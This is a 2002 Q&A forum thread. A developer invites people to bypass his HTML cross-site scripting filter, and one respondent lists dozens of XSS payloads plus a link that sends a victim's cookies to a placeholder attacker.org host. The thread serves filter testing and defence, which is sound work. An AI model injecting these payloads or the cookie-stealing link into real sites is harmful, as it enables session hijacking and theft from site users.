Many web based programs can be vulnerable to a problem known as
"Cross-site scripting" or XSS.  XSS is where a user submits malicious code to
a website to get it posted (eg: in a forum) and automatically executed
by other peoples browsers in the security context of the target site.
You can learn more about XSS here:
http://www.cert.org/advisories/CA-2000-02.html

We've written a an XSS filter to "clean up" HTML content
entered by a user, trying to achieve a balance between allowing "safe"
HTML and filtering out "unsafe" potential-XSS HTML. This filter takes
several approaches: 

1) It removes HTML tags and attributes that are not on an approved list;

2) It searches for and filters/removes certain stylesheet constructs
such as url(...) and expression(...); 

3) It limits some HTML attribute values to a safe subset (e.g. src=""
can only be http, ftp, or mailto)

-------- A demonstration:

We have set up a web page where you can try this filter:

    http://edis.org/xss/

To see the filter in action, enter some HTML into the text box, then
click one of the three filtering options. The webpage will show the
filtered HTML (rendered and as source). 

1. unfiltered: no filtering is done

2. filtered  : standard level of filtering

3. filtered with UTF-8 : standard filtering plus additional UTF-related
filtering (assumes entered text is UTF-8 encoded)


-------- Some known XSS exploits:

The main focus of this filter is to remove or prevent scripts from
running. Here are some known exploits that this filter will catch:

  <img src="javascript:alert('script in img src')">
  <img src="jav&#65;script:alert('script entity coded');">
  <img src="jav[alt-0193][alt-0129]script:alert('script utf8 coded')">
    ([alt-0129] means on Windows machines, press and hold alt, then
press 0193)
  <style>li { background:url(javascript:alert("script in style"))
}</style>

--- The question

Provide us with some code that will bypass our filter and cause script
to be executed on the filtered results page.  For example, if you get a
javascript alert() by the filter, that would be a successful bypass of
the filter.

Go here and try to bypass the filter: http://edis.org/xss/

---

Request for Question Clarification by joseleon-ga on 10 Aug 2002 01:18 PDT

Hello:
  I have found one, but it's not direct or severe, you must prevent
enter links like this:
  
<a href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?'
+document.cookies</script>">Click here</a>

If someone on your web, enter this code on an article, text or
whatever including this link, can be used by a hacker to stole user
cookies from the domain target.com (if it's running Zeus webserver)
and send them to attacker.org.

More information:

Zeus Cross Site Scripting
http://support.zeus.com/security/css.html

If this is useful to you, please, tell it to me.

Regards.

---

Request for Question Clarification by joseleon-ga on 10 Aug 2002 01:34 PDT

Hello:
   I have checked all this exploits and works well with them, I hope
Google Answers has an XSS filter too ;-):

<a href="javas&#99;ript&#35;alert("hola");">
<div onmouseover="alert('hola');">
<img src="javascript:alert('hola');">
<img dynsrc="javascript:alert('hola');">
<input type="image" dynsrc="javascript:alert('hola');">
<bgsound src="javascript:alert('hola');">
&<script>alert('hola');</script>
&{alert('hola');};
<img src=&{alert('hola');};>
<link rel="stylesheet" href="javascript:alert('hola');">
<iframe src="vbscript:alert('hola');">
<img src="mocha:alert('hola');">
<img src="livescript:alert('hola');">
<a href="about:<s&#99;ript>alert('hola');</script>">
<meta http-equiv="refresh" content="0;url=javascript:alert('hola');">
<body onload="alert('hola');">
<div style="background-image: url(javascript:alert('hola'););">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(alert('hola'););">
<style type="text/javascript">alert('hola');</style>
<object classid="clsid:..." codebase="javascript:alert('hola');">
<style><!--</style><script>alert('hola');//--></script>
<![CDATA[<!--]]><script>alert('hola');//--></script>
<!-- -- --><script>alert('hola');</script><!-- -- -->
<<script>alert('hola');</script>
<img src="blah"onmouseover="alert('hola');">
<img src="blah>" onmouseover="alert('hola');">
<xml src="javascript:alert('hola');">
<xml id="X"><a><b>&lt;script>alert('hola');&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>alert('hola');[\xC0][\xBC]/script>

Regards.

---

Clarification of Question by davious-ga on 10 Aug 2002 11:45 PDT

joseleon-ga, thanks for your comments.  

While the Zeus webserver issue is an interested one it really is a
vulnerability with the Zeus webserver and doesn't pose a security risk
on our side.  While it's true users may construct links to other sites
which may be vulnerable to XSS exploits or other security
vulnerabilities there's not really any thing we can do to prevent it. 
There's no way of knowing how other sites will interpret links
(sometimes things like [b] get turned into HTML, sometimes not) and
it's really up to them to prevent XSS attacks on their side.

The easiest way to do that if you're not expecting HTML input (which
in most cases you wouldn't be), is to just HTML encode any HTML
characters, so < becomes &lt;, > becomes &gt;, and so on.  Then no
HTML will get through and any HTML entered will be displayed as raw
html in the browser.  I beleive that's what google does and that's why
this isn't <b>bold</b>.

The challenge for us is allowing people to enter SOME html, but not
HTML that could cause scripting to be executed on our side by any of
our programs.

Thanks for your efforts! : )

---

Request for Question Clarification by joseleon-ga on 11 Aug 2002 00:29 PDT

Hello:
  To prevent enter malicious code that can affect to other sites, you
can also parse the attribute values as if were normal code removing
any tag inside. I have tested your script and I couldn't find any
hole, it seems you have follow verbatim all the recommendations to
prevent XSS ;-)

Regards.

---

Clarification of Question by davious-ga on 12 Aug 2002 09:37 PDT

Thanks for your comments and suggestions! :)

---

Clarification of Question by davious-ga on 13 Aug 2002 15:33 PDT

The list price is now $200 USD.  If anyone else would like to give it
a try please feel free.  Thank you.

---

Request for Question Clarification by joseleon-ga on 14 Aug 2002 01:33 PDT

Just two things more: 
  -I know your web users won't have the source code for the XSS
filter, but it would be great if you post the source code to let us
debug it looking for failures. Because it seems you have followed all
the recommendations against XSS, I think there's not way to bypass
your filter. The only way would be to find a bug in your script.
  -In any case, a full test of your script with a lot lot lot of
samples would deserve the money? I ask you this because if nobody can
bypass your filter you will get an answer, "your filter is perfect".

Regards.

---

Clarification of Question by davious-ga on 14 Aug 2002 16:32 PDT

I'm not able to post the source code at this time, but I may be able
to at a future date.  If it turns out I'm able to post the source code
at a future date, I'll repost the question.